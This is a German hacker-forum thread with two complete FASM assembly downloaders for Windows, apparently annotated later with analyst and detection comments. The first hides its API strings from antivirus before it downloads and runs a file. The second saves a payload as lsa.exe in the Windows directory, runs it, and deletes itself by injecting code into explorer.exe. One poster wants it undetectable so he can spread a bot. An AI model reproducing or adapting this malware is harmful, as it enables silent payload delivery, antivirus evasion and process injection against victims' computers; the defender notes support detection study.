  1. #1
    Duck and Cover Avatar von $_staX

    Standard [Fasm]Web Downloader

    Simpler Webdownloader,
    keine Ahnung für was man ihn brauchen kann, aber mir war langweilig.

    Code:
    ; Analyst summary (FASM, 32-bit Windows; Win32 API calls with arguments pushed
    ; right to left): the program assembles the strings "URLMON.DLL" and
    ; "URLDownloadToFileA" in memory at run time, resolves that function through
    ; LoadLibraryA/GetProcAddress, saves the content behind `url` to the path in
    ; `ziel`, opens the saved file with ShellExecuteA and exits.
    ; Detection notes: neither string is stored contiguously in the image, so
    ; static string matching on the file will not see them. The behavioural chain
    ; (urlmon.dll loaded at run time -> file written from the network -> that file
    ; launched by the same process) is the more dependable signal, as is a
    ; GetProcAddress lookup whose name buffer lives in writable data.
    include '%include%/WIN32AX.inc'
    .data
            url db "url",0                  ; placeholder for the download URL
            ziel db "C:\test.exe",0         ; destination path ("ziel" = target)
    
    ; reserve a few bytes
            urlmon rd 10                    ; buffer for the DLL name built at run time
            Down rd 18                      ; buffer for the API name built at run time
            dllhandle rd 1                  ; module handle returned by LoadLibraryA
            DownloadFile rd 1               ; function pointer returned by GetProcAddress
    
    .code
    main:
    ; write "urlmon.dll" at run time, because of AVs (author's stated reason)
    ; The buffer first receives decoy bytes, which later writes overwrite.
    ; NOTE(review): no terminating NUL is written; presumably relies on the
    ; reserved data being zero-filled - confirm.
            mov dword [urlmon], 'U3SM'      ; buffer: "U3SM"
            mov dword [urlmon+4d], 'ON.D'   ; buffer: "U3SMON.D"
            mov word  [urlmon+1d], 'RL'     ; buffer: "URLMON.D" (decoy bytes replaced)
            mov word [urlmon+8d], 'LL'      ; buffer: "URLMON.DLL"
    ; load urlmon.dll
            push urlmon
            call [LoadLibraryA]
            mov [dllhandle],eax
    ; write "URLDownloadToFileA" at run time
            mov dword [Down], 'UbcD'        ; buffer: "UbcD"
            mov dword [Down+4d], 'ownl'     ; buffer: "UbcDownl"
            mov dword [Down+8d], 'oRdT'     ; buffer: "UbcDownloRdT"
            mov word [Down+1d], 'RL'        ; buffer: "URLDownloRdT"
            mov dword [Down+12d], 'oFil'    ; buffer: "URLDownloRdToFil"
            mov word [Down+16d], 'eA'       ; buffer: "URLDownloRdToFileA"
            mov byte [Down+9d], 'a'         ; buffer: "URLDownloadToFileA"
    ; API address
            push Down
            push [dllhandle]
            call [GetProcAddress]
            mov [DownloadFile],eax
    ; download: call through the resolved pointer with (0, url, ziel, 0, 0)
            push 0
            push 0
            push ziel
            push url
            push 0
            call [DownloadFile]
    ; execute: ShellExecuteA(HWND_DESKTOP, NULL, ziel, NULL, NULL, SW_SHOWNORMAL)
    ; Defender note: the child process is started from a file this same process
    ; has just written; process-creation logging that records the parent and the
    ; image path exposes that relationship.
            push SW_SHOWNORMAL
            push NULL
            push NULL
            push ziel
            push NULL
            push HWND_DESKTOP
            call [ShellExecuteA]
    
            push 0
            call [ExitProcess]
    
    .end main
    Geändert von $_staX (11.06.2009 um 12:22 Uhr)

    First you duck and then you cover!
    #

  2. #2
    ♠ ♣ ♥ ♦

    Standard

    Hab hier auch noch einen, wie siehts mit der Detection Rate von deinem aus? eventuell was gutes für mich zum Bot spreaden wenn er Fud ist.


    ; Small selfdeleting downloader
    ; by DiA/RRLF (c)06
    ; www.vx-dia.de.vu

    include "%fasminc%\win32ax.inc"

    ; _invoke proc, args...: pushes the arguments in reverse order (pushd) and then
    ; calls through the pointer stored at [ebp + proc]. In this file it is used
    ; only inside the RemoteThreadStart..RemoteThreadEnd region, where ebp holds
    ; the difference between the run-time and assemble-time address of that code,
    ; so the call works wherever the region has been copied.
    macro _invoke proc,[arg]
    { common
    if ~ arg eq
    reverse
    pushd arg
    common
    end if
    call [ebp + proc] }

    ; Program entry point is the label DowloadFile (spelling as in the source).
    entry DowloadFile

    ; Code and data share a single section flagged readable + writeable +
    ; executable. Defender note: an RWX section in a PE image is an anomaly that
    ; static triage can flag.
    section '.code' code readable writeable executable

    URL db "http://url.com/here.exe", 0 ;the executable to download
    SaveAs db "\lsa.exe", 0 ;save as, in windows directory

    ; Working storage for the download phase.
    InetHandle dd ?                     ; handle returned by InternetOpen
    UrlHandle dd ?                      ; handle returned by InternetOpenUrl
    FileHandle dd ?                     ; handle returned by CreateFile
    ReadNext dd ?                       ; bytes read by the last InternetReadFile; loop control
    DownloadBuffer rb 1024d             ; transfer buffer, one chunk per iteration
    BytesWritten dd ?                   ; out-parameter of WriteFile
    WindowsDir rb 256d                  ; Windows directory, later with SaveAs appended
    ; Working storage for the process enumeration and the cross-process write.
    ProcessEntryOwn PROCESSENTRY32
    SnapHandleOwn dd ?                  ; handle returned by CreateToolhelp32Snapshot
    ProcessHandle dd ?                  ; handle returned by OpenProcess
    BaseAddress dd ?                    ; address returned by VirtualAllocEx
    StartupInfo STARTUPINFO
    ProcessInfo PROCESS_INFORMATION

    ; DowloadFile: download phase. Builds "<Windows directory>\lsa.exe", fetches
    ; URL through WinINet in 1024-byte chunks into that file and starts it with
    ; CreateProcess. Execution then falls through into DownloadFileError, so the
    ; code there runs after a successful download as well as after a failure.
    ; Defender notes: the observable artefacts are a new executable written to the
    ; Windows directory by a non-installer process and a child process created
    ; from that file. URL is also passed as the first argument of InternetOpen,
    ; which WinINet uses as the agent string, so the requests would presumably
    ; carry the URL as their User-Agent value - a distinctive network indicator.
    DowloadFile:
    ; WindowsDir = Windows directory path (buffer size 256)
    invoke GetWindowsDirectory,\
    WindowsDir,\
    256d

    ; WindowsDir += "\lsa.exe"
    invoke lstrcat,\
    WindowsDir,\
    SaveAs

    ; Open a WinINet session; a zero result skips to DownloadFileError.
    invoke InternetOpen,\
    URL,\
    0,\
    0,\
    0,\
    0

    cmp eax, 0
    je DownloadFileError

    mov dword [InetHandle], eax

    ; Open the remote resource named by URL.
    invoke InternetOpenUrl,\
    dword [InetHandle],\
    URL,\
    0,\
    0,\
    0,\
    0

    cmp eax, 0
    je DownloadFileError

    mov dword [UrlHandle], eax

    ; Create the destination file; CREATE_NEW means an existing file is not
    ; overwritten. The result is compared with 0 before it is stored.
    invoke CreateFile,\
    WindowsDir,\
    GENERIC_WRITE,\
    FILE_SHARE_WRITE,\
    0,\
    CREATE_NEW,\
    FILE_ATTRIBUTE_NORMAL,\
    0

    cmp eax, 0
    je DownloadFileError

    mov dword [FileHandle], eax

    ; Make ReadNext non-zero so the first loop test passes
    ; (assumes the reserved dword starts at zero - TODO confirm).
    inc dword [ReadNext]

    ; Copy loop: read up to 1024 bytes, write the number of bytes actually read,
    ; stop once a read reports zero bytes.
    ReadNextBytes:
    cmp dword [ReadNext], 0
    je DownloadComplete

    invoke InternetReadFile,\
    dword [UrlHandle],\
    DownloadBuffer,\
    1024d,\
    ReadNext

    invoke WriteFile,\
    dword [FileHandle],\
    DownloadBuffer,\
    dword [ReadNext],\
    BytesWritten,\
    0

    jmp ReadNextBytes

    ; Close the file and both WinINet handles, then start the saved file.
    DownloadComplete:
    invoke CloseHandle,\
    dword [FileHandle]

    invoke InternetCloseHandle,\
    dword [UrlHandle]

    invoke InternetCloseHandle,\
    dword [InetHandle]

    invoke CreateProcess,\
    WindowsDir,\
    0,\
    0,\
    0,\
    0,\
    CREATE_NEW_CONSOLE,\
    0,\
    0,\
    StartupInfo,\
    ProcessInfo

    ; DownloadFileError: self-removal phase, reached by a jump on download errors
    ; and by fall-through after CreateProcess. It records this program's own path
    ; and the address of DeleteFileA inside the RemoteThreadStart..RemoteThreadEnd
    ; region, finds explorer.exe in a process snapshot, copies that region into
    ; explorer.exe and starts a thread there. Any failed step jumps to Exit.
    ; Defender notes: this is cross-process memory allocation, memory write and
    ; remote thread creation against explorer.exe by an unrelated process.
    ; Endpoint telemetry records each step, e.g. Sysmon ProcessAccess (event 10)
    ; for the OpenProcess with VM_OPERATION/VM_WRITE/CREATE_THREAD rights and
    ; CreateRemoteThread (event 8) for the thread start. DeleteFileA is resolved
    ; by name at run time and does not appear in the import table.
    DownloadFileError:
    ; OwnFilename = full path of the running executable (module handle 0)
    invoke GetModuleFileName,\
    0,\
    OwnFilename,\
    256

    invoke LoadLibrary,\
    "kernel32.dll"

    cmp eax, 0
    je Exit

    ; Store the resolved address in _DeleteFile, which lies inside the copied region.
    invoke GetProcAddress,\
    eax,\
    "DeleteFileA"
    mov dword [_DeleteFile], eax

    ; PROCESSENTRY32.dwSize is set before the structure is passed to Process32First.
    mov dword [ProcessEntryOwn.dwSize], sizeof.PROCESSENTRY32

    ; Snapshot of running processes (flag value 2).
    invoke CreateToolhelp32Snapshot,\
    2,\
    0

    cmp eax, 0
    je Exit

    mov dword [SnapHandleOwn], eax

    invoke Process32First,\
    dword [SnapHandleOwn],\
    ProcessEntryOwn

    ; Walk the snapshot until an entry named "explorer.exe" (case-insensitive)
    ; is found; a zero result from Process32First/Process32Next ends the search.
    NextTargetProcess:
    cmp eax, 0
    je Exit

    invoke lstrcmpi,\
    ProcessEntryOwn.szExeFile,\
    "explorer.exe"

    cmp eax, 0
    je FoundExplorer

    invoke Process32Next,\
    dword [SnapHandleOwn],\
    ProcessEntryOwn

    jmp NextTargetProcess

    FoundExplorer:
    invoke CloseHandle,\
    dword [SnapHandleOwn]

    ; Open the matched process with the rights needed for the three calls below.
    invoke OpenProcess,\
    PROCESS_VM_OPERATION + PROCESS_VM_WRITE + PROCESS_CREATE_THREAD,\
    0,\
    dword [ProcessEntryOwn.th32ProcessID]

    cmp eax, 0
    je Exit

    mov dword [ProcessHandle], eax

    ; Reserve room in the other process for the whole region (code plus data).
    invoke VirtualAllocEx,\
    dword [ProcessHandle],\
    0,\
    RemoteThreadEnd - RemoteThreadStart,\
    MEM_COMMIT,\
    PAGE_READWRITE

    cmp eax, 0
    je Exit

    mov dword [BaseAddress], eax

    ; Copy the region, including OwnFilename and _DeleteFile filled in above.
    invoke WriteProcessMemory,\
    dword [ProcessHandle],\
    dword [BaseAddress],\
    RemoteThreadStart,\
    RemoteThreadEnd - RemoteThreadStart,\
    0

    cmp eax, 0
    je Exit

    ; Start a thread in the other process at the start of the copied region.
    invoke CreateRemoteThread,\
    dword [ProcessHandle],\
    0,\
    0,\
    dword [BaseAddress],\
    0,\
    0,\
    0

    invoke CloseHandle,\
    dword [ProcessHandle]

    ; Terminate this process; the file deletion is left to the copied code.
    Exit:
    invoke ExitProcess,\
    0

    ; RemoteThreadStart..RemoteThreadEnd: the region that DownloadFileError copies
    ; into explorer.exe. It is written to run at an arbitrary address: call/pop
    ; yields the run-time address of DeltaOffset, and subtracting the assemble-time
    ; address leaves the relocation delta in ebp. The body calls DeleteFileA on
    ; OwnFilename through the stored pointer and repeats until the call returns
    ; non-zero, then returns.
    ; Defender note: the deletion of the original executable is therefore issued
    ; by explorer.exe, not by the program itself; file-delete telemetry attributed
    ; to explorer.exe shortly after a remote thread was created in it is the
    ; trace to correlate.
    RemoteThreadStart:
    call DeltaOffset

    DeltaOffset:
    pop ebp                             ; ebp = run-time address of DeltaOffset
    sub ebp, DeltaOffset                ; ebp = run-time minus assemble-time address

    DeleteLoop:
    lea eax, dword [ebp + OwnFilename]  ; eax = relocated address of the path string

    ; call [ebp + _DeleteFile] with eax as the single argument
    _invoke _DeleteFile,\
    eax

    cmp eax, 0                          ; zero result: retry
    je DeleteLoop

    ReturnThread:
    ret

    ; Data carried along with the copied code.
    RemoteDatas:
    OwnFilename rb 256d                 ; path filled in by GetModuleFileName
    _DeleteFile dd ?                    ; address filled in by GetProcAddress
    RemoteThreadEnd:

    ; Import table: kernel32.dll and wininet.dll only.
    ; Defender note: the table statically lists the cross-process set (OpenProcess,
    ; VirtualAllocEx, WriteProcessMemory, CreateRemoteThread) and the process
    ; enumeration set (CreateToolhelp32Snapshot, Process32First/Next) alongside
    ; the WinINet download functions and CreateProcessA. That combination in a
    ; small executable is a useful static triage signal. DeleteFileA is absent
    ; here because the code resolves it with GetProcAddress at run time.
    section '.idata' import data readable writeable
    library kernel, "kernel32.dll",\
    wininet, "wininet.dll"

    import kernel,\
    WriteFile, "WriteFile",\
    CreateFile, "CreateFileA",\
    CloseHandle, "CloseHandle",\
    lstrcat, "lstrcatA",\
    GetWindowsDirectory, "GetWindowsDirectoryA",\
    GetModuleFileName, "GetModuleFileNameA",\
    LoadLibrary, "LoadLibraryA",\
    GetProcAddress, "GetProcAddress",\
    CreateToolhelp32Snapshot, "CreateToolhelp32Snapshot",\
    Process32First, "Process32First",\
    Process32Next, "Process32Next",\
    lstrcmpi, "lstrcmpiA",\
    CreateProcess, "CreateProcessA",\
    OpenProcess, "OpenProcess",\
    VirtualAllocEx, "VirtualAllocEx",\
    WriteProcessMemory, "WriteProcessMemory",\
    CreateRemoteThread, "CreateRemoteThread",\
    ExitProcess, "ExitProcess"

    import wininet,\
    InternetOpen, "InternetOpenA",\
    InternetOpenUrl, "InternetOpenUrlA",\
    InternetReadFile, "InternetReadFile",\
    InternetCloseHandle, "InternetCloseHandle"

  3. #3
    I'm in ur VM. Avatar von l0dsb

    Standard

    Wieso benutzt ihr Assembler für solche Dinge, ohne irgendeine Notwendigkeit, die Sprache zu verwenden?
    I can haz RCE?

  4. #4
    Duck and Cover Avatar von $_staX

    Standard

    Zitat Zitat von ;X Beitrag anzeigen
    Wieso benutzt ihr Assembler für solche Dinge, ohne irgendeine Notwendigkeit, die Sprache zu verwenden?
    Weil mir langweilig war
    Geändert von $_staX (20.02.2010 um 22:14 Uhr)

    First you duck and then you cover!
    #
